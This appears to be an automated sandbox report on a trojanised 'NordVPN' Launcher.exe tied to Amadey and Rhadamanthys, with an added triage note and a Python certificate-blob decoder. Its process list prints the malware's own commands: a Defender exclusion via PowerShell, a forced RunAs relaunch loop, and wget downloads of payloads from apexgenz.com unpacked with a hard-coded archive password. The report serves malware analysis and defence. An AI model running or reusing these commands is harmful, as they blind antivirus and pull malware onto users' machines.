Analysis Overview
SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
Threat Level: Known bad
The file Launcher.exe was found to be: Known bad.
Malicious Activity Summary
Amadey
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Executes dropped EXE
Enumerates physical storage devices
Program crash
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-29 14:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-29 14:54
Reported
2024-03-29 15:01
Platform
win10v2004-20240226-en
Max time kernel
233s
Max time network
275s
Command Line
Signatures
Amadey
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3700 created 2768 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | C:\Windows\system32\sihost.exe |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (duplicate blob value elided) | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (duplicate blob value elided) | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (duplicate blob value elided) | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
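Triage note on this signature (an editorial addition, not part of the sandbox output): the key name D69B561148F01C77C54578C10926DF5B856976AD is a SHA-1 certificate thumbprint, and its parent key is AuthRoot, the cache Windows fills from the automatic root update program the first time a chain to a not-yet-cached public root is built. A root planted by malware to intercept TLS would be written under SystemCertificates\ROOT instead. The Blob value is a serialized list of CERT_*_PROP_ID properties, each DWORD id, DWORD reserved, DWORD length, data. The Python below, added here as an example and not taken from the sandbox vendor or from the sample, decodes the full blob shown in this table: the friendly-name property reads "GlobalSign Root CA - R3", and the SHA-1 of the embedded DER certificate equals both the stored hash property and the registry key name, so the write is the GlobalSign public root being cached as a side effect of the sample's TLS connections, not a trust-store implant. Property-ID names come from wincrypt.h; the hex constant is the table row's value, split where the page's row wrapped.

```python
"""Decode an AuthRoot Certificates <thumbprint> Blob registry value."""
import hashlib
import struct

# Registry key the write was logged under: a SHA-1 certificate thumbprint.
KEY_THUMBPRINT = "D69B561148F01C77C54578C10926DF5B856976AD"

# Blob value copied from the report row. The first ten chunks are one
# property each; the last two are the CERT_CERT_PROP_ID entry (header plus
# DER certificate), split where the page's table row wrapped.
BLOB_HEX = (
    "190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f"
    "0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab"
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308"
    "530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0"
    "0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000"
    "620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b"
    "1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc"
    "1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953"
    "030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad"
    "040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028"
    "2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e326"
    "0e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f"
)
BLOB = bytes.fromhex(BLOB_HEX)

# Property IDs as defined in wincrypt.h (CERT_*_PROP_ID).
PROP_NAMES = {
    0x03: "SHA1_HASH", 0x04: "MD5_HASH", 0x09: "ENHKEY_USAGE",
    0x0B: "FRIENDLY_NAME", 0x0F: "SIGNATURE_HASH", 0x14: "KEY_IDENTIFIER",
    0x19: "SUBJECT_PUBLIC_KEY_MD5_HASH", 0x1D: "SUBJECT_NAME_MD5_HASH",
    0x20: "CERT", 0x53: "ROOT_PROGRAM_CERT_POLICIES", 0x62: "AUTH_ROOT_SHA256_HASH",
}


def parse_cert_blob(blob):
    """Walk the serialized property list: each entry is
    DWORD propid | DWORD reserved (1) | DWORD cbData | BYTE data[cbData]."""
    props, off = {}, 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError("truncated property header at offset %d" % off)
        propid, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        data = blob[off:off + length]
        if len(data) != length:
            raise ValueError("property 0x%x runs past the end of the blob" % propid)
        off += length
        props[propid] = data
    return props


def describe(blob, key_thumbprint):
    """Summarize the blob and check the embedded certificate against the key name."""
    props = parse_cert_blob(blob)
    der = props[0x20]
    # Outer SEQUENCE with a two-byte length: 30 82 LL LL, so total = LL LL + 4.
    if der[:2] != b"\x30\x82":
        raise ValueError("unexpected DER framing")
    declared_len = struct.unpack(">H", der[2:4])[0] + 4
    sha1 = hashlib.sha1(der).hexdigest()
    return {
        "friendly_name": props[0x0B].decode("utf-16-le").rstrip("\x00"),
        "properties": {PROP_NAMES.get(pid, "0x%x" % pid): len(data) for pid, data in props.items()},
        "cert_len": len(der),
        "der_len_consistent": declared_len == len(der),
        "sha1": sha1,
        # Key name, stored SHA1_HASH property and recomputed hash must all agree.
        "matches_key": sha1 == key_thumbprint.lower() == props[0x03].hex(),
    }


if __name__ == "__main__":
    for key, value in describe(BLOB, KEY_THUMBPRINT).items():
        print("%s: %s" % (key, value))
```

The same decoder applies to any Blob under SystemCertificates; the triage question is which store the key sits in (AuthRoot or CA for cached public roots and intermediates, ROOT or the per-user store for anything an installer added) and whether the recomputed SHA-1 of the CERT property agrees with the key name.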
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\NordVPN-10_11.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.0.1356778034\781898511" -parentBuildID 20221007134813 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bac3c253-492e-4754-8824-332a5a2ce8c1} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 1980 1450b8f6a58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.1.824453598\2145723619" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acaa10f2-4a25-4541-ba6c-256fe5ca92f9} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2380 1450b7f5458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.2.353070175\1465853438" -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438e99c7-e7df-4dcd-88d1-7e7cf4d178fd} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3120 1450f9bdc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.3.1668280839\1170008933" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c2570-f71b-4ea2-86f9-0942de763845} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3588 1450e3ad558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.4.1512091846\1798937739" -childID 3 -isForBrowser -prefsHandle 4544 -prefMapHandle 4540 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e44030b0-6a2d-4728-a678-f6897fe0e0cc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 4552 145115a2f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.5.1946169069\286040142" -childID 4 -isForBrowser -prefsHandle 5000 -prefMapHandle 4996 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48b1b25d-d050-42b7-9d6c-a24b299f21bc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5008 14511f09c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.6.500169602\1990768902" -childID 5 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e902716-9475-45c0-996a-fa79f2f68a0a} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5032 14511f0c258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.7.1205998962\1432607393" -childID 6 -isForBrowser -prefsHandle 5288 -prefMapHandle 5164 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e73a16d0-cffd-455e-a9e9-294ea1e798fb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5276 14511f0d758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.8.559184309\1915907281" -childID 7 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5967c015-3b37-48fe-831f-3d6948a42493} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5860 145139ab558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.9.1771782841\217158023" -childID 8 -isForBrowser -prefsHandle 5056 -prefMapHandle 5108 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {829adee5-4281-4ef9-a610-03061e01936e} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5048 14512447b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.10.1618326309\413425509" -parentBuildID 20221007134813 -prefsHandle 4844 -prefMapHandle 4272 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a284c35b-bbc6-45d5-89c3-7d15b45bcfbb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2796 1450e05da58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.11.318254061\19738600" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 3236 -prefMapHandle 3164 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fbb6aa6-4d30-414c-b886-0b96befe9b38} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2864 1450f2f7558 utility
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap27144:88:7zEvent917
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin16904
C:\Users\Admin\AppData\Roaming\services\plugin16904
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 628
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6622:88:7zEvent8870
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin20718
C:\Users\Admin\AppData\Roaming\services\2plugin20718
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin16826
C:\Users\Admin\AppData\Roaming\services\3plugin16826
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 904
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
